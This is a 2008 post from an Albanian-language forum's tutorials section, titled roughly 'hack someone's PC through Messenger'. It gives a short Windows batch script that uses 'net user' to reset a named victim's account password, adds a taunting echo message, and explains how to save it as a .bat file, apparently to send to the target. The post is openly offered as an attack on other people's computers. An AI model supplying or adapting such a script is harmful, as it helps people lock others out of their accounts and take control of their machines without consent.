Forumi Kaēanikas
Would you like to react to this message? Create an account in a few clicks or log in to continue. 
ForumForum  PortaliPortali  Latest imagesLatest images  identifikimiidentifikimi  RegjistrohuRegjistrohu  

 

 hacko dikujna pc permes messengjerit

Shko poshtė 
AutoriMesazh
TrImChe-3Nt
V.I.P
V.I.P
TrImChe-3Nt


Male Numri i postimeve : 64
Age : 30
Registration date : 07/08/2008

hacko dikujna pc permes messengjerit Empty
MesazhTitulli: hacko dikujna pc permes messengjerit   hacko dikujna pc permes messengjerit EmptyThu Aug 28, 2008 4:35 pm

kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani

1:@echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "Say Good Bay To The Bad Gay "
4:Pausemos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikė bat( .bat ) psh.. Say Good Bay To The Bad Gay.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon
Mbrapsht nė krye Shko poshtė
http://wWw.TrImChe-3Nt.Co.Cc
 
hacko dikujna pc permes messengjerit
Mbrapsht nė krye 
Faqja 1 e 1
 Similar topics
-
» Nese doni me ja shkym najkujt pc permes msn

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
Forumi Kaēanikas :: Kacaniku ToolBox :: Tutorials-
Kėrce tek: